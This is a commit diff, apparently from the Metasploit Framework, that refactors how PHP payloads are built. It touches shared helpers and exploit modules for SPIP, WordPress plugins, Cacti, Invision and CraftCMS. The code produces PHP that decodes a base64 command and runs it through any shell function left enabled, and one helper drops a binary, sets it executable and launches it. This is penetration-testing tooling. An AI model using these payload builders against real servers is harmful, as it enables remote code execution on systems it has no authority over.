Major refactoring of PHP payloads and related exploits

Author: zeroSteiner

lib/msf/core/exploit/php_exe.rb

@@ -49,17 +49,16 @@ def get_write_exec_payload(opts={})
         print_warning("Unable to clean up #{bin_name}, delete it manually")
       end
       p = Rex::Text.encode_base64(generate_payload_exe)
-      vars = Rex::RandomIdentifier::Generator.new
-      dis = "$#{vars[:dis]}"
+      vars = Rex::RandomIdentifier::Generator.new(language: :php)
       php = %Q{
-      #{php_preamble(disabled_varname: dis)}
+      #{php_preamble(vars_generator: vars)}
       $ex = "#{bin_name}";
       $f = fopen($ex, "wb");
       fwrite($f, base64_decode("#{p}"));
       fclose($f);
       chmod($ex, 0777);
       function my_cmd($cmd) {
-      #{php_system_block(disabled_varname: dis)};
+      #{php_system_block(vars_generator: vars)};
       }
       if (FALSE === strpos(strtolower(PHP_OS), 'win' )) {
         my_cmd($ex . "&");

lib/msf/core/exploit/remote/http/wordpress/admin.rb

@@ -61,11 +61,10 @@ def generate_plugin(plugin_name, payload_name)
 
     php_code = "<?php #{payload.encoded} ?>"
     if target['Arch'] != ARCH_PHP
-      dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))
+      vars = Rex::RandomIdentifier::Generator.new(language: :php)
       php_code = <<-END_OF_PHP_CODE
-        #{php_preamble(disabled_varname: dis)}
-        $c = base64_decode("#{Rex::Text.encode_base64(payload.encoded)}");
-        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+        #{php_preamble(vars_generator: vars)}
+        #{php_system_block(vars_generator: vars, cmd: payload.encoded)}
       END_OF_PHP_CODE
       php_code = php_code + '?>'
     end

lib/msf/core/payload/php.rb

@@ -17,8 +17,10 @@ module Msf::Payload::Php
   # @return [String] A chunk of PHP code
   #
   def self.preamble(options = {})
-    dis = options[:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
-    dis = '$' + dis if (dis[0,1] != '$')
+    vars = options.fetch(:vars_generator) { Rex::RandomIdentifier::Generator.new(language: :php) }
+
+    dis = options[:disabled_varname] || vars[:disabled_varname]
+    dis = "$#{dis}" unless dis.start_with?('$')
 
     # Canonicalize the list of disabled functions to facilitate choosing a
     # system-like function later.
@@ -55,21 +57,23 @@ def php_preamble(options = {})
   #   command.
   #
   def self.system_block(options = {})
-    cmd = options[:cmd_varname] || '$cmd'
-    dis = options[:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
-    output = options[:output_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
+    vars = options.fetch(:vars_generator) { Rex::RandomIdentifier::Generator.new(language: :php) }
+
+    cmd = options[:cmd_varname] || vars[:cmd_varname]
+    dis = options[:disabled_varname] || vars[:disabled_varname]
+    output = options[:output_varname] || vars[:output_varname]
 
-    cmd    = '$' + cmd if (cmd[0,1] != '$')
-    dis    = '$' + dis if (dis[0,1] != '$')
-    output = '$' + output if (output[0,1] != '$')
+    cmd    = '$' + cmd unless cmd.start_with?('$')
+    dis    = '$' + dis unless dis.start_with?('$')
+    output = '$' + output unless output.start_with?('$')
 
-    is_callable = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
-    in_array    = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
+    is_callable = vars[:is_callable_varname]
+    in_array    = vars[:in_array_varname]
 
     setup = ''
     if options[:cmd]
       setup << <<~TEXT
-        #{cmd}=gzuncompress(base64_decode('#{Rex::Text.encode_base64(Rex::Text.zlib_deflate(options[:cmd]))}'));
+        #{cmd}=base64_decode('#{Rex::Text.encode_base64(options[:cmd])}');
       TEXT
     end
     setup << <<~TEXT
@@ -153,6 +157,14 @@ def php_system_block(options = {})
     Msf::Payload::Php.system_block(options)
   end
 
+  def php_exec_cmd(cmd)
+    vars = Rex::RandomIdentifier::Generator.new(language: :php)
+    <<-END_OF_PHP_CODE
+      #{php_preamble(vars_generator: vars)}
+      #{php_system_block(vars_generator: vars, cmd: cmd)}
+    END_OF_PHP_CODE
+  end
+
   def self.create_exec_stub(php_code, options = {})
     payload = Rex::Text.encode_base64(Rex::Text.zlib_deflate(php_code))
     b64_stub = "eval(gzuncompress(base64_decode('#{payload}')));"

modules/exploits/linux/http/craftcms_preauth_rce_cve_2025_32432.rb

@@ -232,16 +232,4 @@ def exploit
     print_status('Injecting stub & triggering payload...')
     execute_via_session(payload_code)
   end
-
-  def php_exec_cmd(encoded_payload)
-    gen = Rex::RandomIdentifier::Generator.new
-    disabled_var = "$#{gen[:dis]}"
-    b64 = Rex::Text.encode_base64(encoded_payload)
-
-    <<~PHP
-      #{php_preamble(disabled_varname: disabled_var)}
-      $c=base64_decode("#{b64}");
-      #{php_system_block(cmd_varname: '$c', disabled_varname: disabled_var)}
-    PHP
-  end
 end

modules/exploits/multi/http/cacti_package_import_rce.rb

@@ -155,22 +155,10 @@ def check
     CheckCode::Appears
   end
 
-  # Taken from modules/payloads/singles/php/exec.rb
-  def php_exec(cmd)
-    dis = '$' + rand_text_alpha(4..7)
-    shell = <<-END_OF_PHP_CODE
-    #{php_preamble(disabled_varname: dis)}
-    $c = base64_decode("#{Rex::Text.encode_base64(cmd)}");
-    #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-
-    Rex::Text.compress(shell)
-  end
-
   def generate_package
     @payload_path = "resource/#{rand_text_alphanumeric(5..10)}.php"
 
-    php_payload = target['Type'] == :php ? payload.encoded : php_exec(payload.encoded)
+    php_payload = target['Type'] == :php ? payload.encoded : php_exec_cmd(payload.encoded)
 
     digest = OpenSSL::Digest.new('SHA256')
     pkey = OpenSSL::PKey::RSA.new(2048)

modules/exploits/multi/http/invision_customcss_rce.rb

@@ -88,19 +88,6 @@ def check
     end
   end
 
-  # I'll remove this method when PR #20160 is merged. I'm aware of it, thanks
-  def php_exec_cmd(encoded_payload)
-    vars = Rex::RandomIdentifier::Generator.new
-    dis = '$' + vars[:dis]
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-    shell = <<-END_OF_PHP_CODE
-        #{php_preamble(disabled_varname: dis)}
-        $c = base64_decode("#{encoded_clean_payload}");
-        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-    return shell
-  end
-
   def exploit
     raw = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
     b64 = Rex::Text.encode_base64(raw)

modules/exploits/multi/http/spip_bigup_unauth_rce.rb

@@ -146,22 +146,6 @@ def get_form_data
     nil
   end
 
-  # This function generates PHP code to execute a given payload on the target.
-  # We use Rex::RandomIdentifier::Generator to create a random variable name to avoid conflicts.
-  # The payload is encoded in base64 to prevent issues with special characters.
-  # The generated PHP code includes the necessary preamble and system block to execute the payload.
-  # This approach allows us to test multiple functions and not limit ourselves to potentially dangerous functions like 'system' which might be disabled.
-  def php_exec_cmd(encoded_payload)
-    vars = Rex::RandomIdentifier::Generator.new
-    dis = "$#{vars[:dis]}"
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-    <<-END_OF_PHP_CODE
-              #{php_preamble(disabled_varname: dis)}
-              $c = base64_decode("#{encoded_clean_payload}");
-              #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-  end
-
   def exploit
     form_data = get_form_data
 

modules/exploits/multi/http/spip_connect_exec.rb

@@ -97,18 +97,6 @@ def check
     Exploit::CheckCode::Safe
   end
 
-  def php_exec_cmd(encoded_payload)
-    vars = Rex::RandomIdentifier::Generator.new
-    dis = '$' + vars[:dis]
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-    shell = <<-END_OF_PHP_CODE
-        #{php_preamble(disabled_varname: dis)}
-        $c = base64_decode("#{encoded_clean_payload}");
-        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-    return shell
-  end
-
   def exploit
     uri = normalize_uri(target_uri.path, 'spip.php')
     print_status("#{rhost}:#{rport} - Attempting to exploit...")

modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb

@@ -105,17 +105,6 @@ def check
     CheckCode::Appears("The detected SPIP version (#{rversion}) is vulnerable.")
   end
 
-  def php_exec_cmd(encoded_payload)
-    dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-    shell = <<-END_OF_PHP_CODE
-        #{php_preamble(disabled_varname: dis)}
-        $c = base64_decode("#{encoded_clean_payload}");
-        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-    return shell
-  end
-
   def exploit
     print_status('Preparing to send exploit payload to the target...')
     phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)

modules/exploits/multi/http/spip_rce_form.rb

@@ -112,18 +112,6 @@ def send_payload(cmd, args = {})
     )
   end
 
-  def php_exec_cmd(encoded_payload)
-    vars = Rex::RandomIdentifier::Generator.new
-    dis = '$' + vars[:dis]
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-    shell = <<-END_OF_PHP_CODE
-        #{php_preamble(disabled_varname: dis)}
-        $c = base64_decode("#{encoded_clean_payload}");
-        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-    return shell
-  end
-
   def exploit
     uri = normalize_uri(target_uri.path, 'spip.php?page=spip_pass&lang=fr')
     res = send_request_cgi({ 'uri' => uri })

modules/exploits/multi/http/wp_backup_migration_php_filter.rb

@@ -95,18 +95,6 @@ def check
     CheckCode::Appears
   end
 
-  def php_exec_cmd(encoded_payload)
-    vars = Rex::RandomIdentifier::Generator.new
-    dis = '$' + vars[:dis]
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-    shell = <<-END_OF_PHP_CODE
-        #{php_preamble(disabled_varname: dis)}
-        $c = base64_decode("#{encoded_clean_payload}");
-        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-    return shell
-  end
-
   def exploit
     print_status('Sending the payload, please wait...')
 

modules/exploits/multi/http/wp_hash_form_rce.rb

@@ -125,19 +125,6 @@ def get_nonce
     nonce_match ? nonce_match[1] : nil
   end
 
-  def php_exec_cmd(encoded_payload)
-    dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))
-    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
-
-    shell = <<-END_OF_PHP_CODE
-      #{php_preamble(disabled_varname: dis)}
-      $c = base64_decode("#{encoded_clean_payload}");
-      #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
-    END_OF_PHP_CODE
-
-    return Rex::Text.compress(shell)
-  end
-
   def upload_php_file(nonce)
     file_content = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
     file_name = "#{Rex::Text.rand_text_alpha_lower(8)}.php"

modules/exploits/multi/http/wp_time_capsule_file_upload_rce.rb

@@ -74,18 +74,6 @@ def initialize(info = {})
     )
   end
 
-  def php_exec_cmd(encoded_payload)
-    dis = '$' + Rex::RandomIdentifier::Generator.new.generate
-    b64_encoded_payload = Rex::Text.encode_base64(encoded_payload)
-    shell = <<-END_OF_PHP_CODE
-    #{php_preamble(disabled_varname: dis)}
-    $cmd = base64_decode("#{b64_encoded_payload}");
-    #{php_system_block(cmd_varname: '$cmd', disabled_varname: dis)}
-    END_OF_PHP_CODE
-
-    return Rex::Text.compress(shell)
-  end
-
   def check
     return CheckCode::Unknown('The WordPress site does not appear to be online.') unless wordpress_and_online?
 

modules/payloads/adapters/php/unix/cmd.rb

@@ -0,0 +1,36 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  include Msf::Payload::Adapter
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'OS Command Exec',
+        'Description' => 'Execute an OS command from PHP',
+        'Author' => 'Spencer McIntyre',
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'License' => MSF_LICENSE,
+        'AdaptedArch' => ARCH_CMD,
+        'AdaptedPlatform' => 'unix'
+      )
+    )
+  end
+
+  def generate(_opts = {})
+    payload = super
+
+    vars = Rex::RandomIdentifier::Generator.new(language: :php)
+
+    <<~TEXT
+      #{Msf::Payload::Php.preamble(vars_generator: vars)}
+      #{Msf::Payload::Php.system_block(vars_generator: vars, cmd: payload)}
+      ?>
+    TEXT
+  end
+end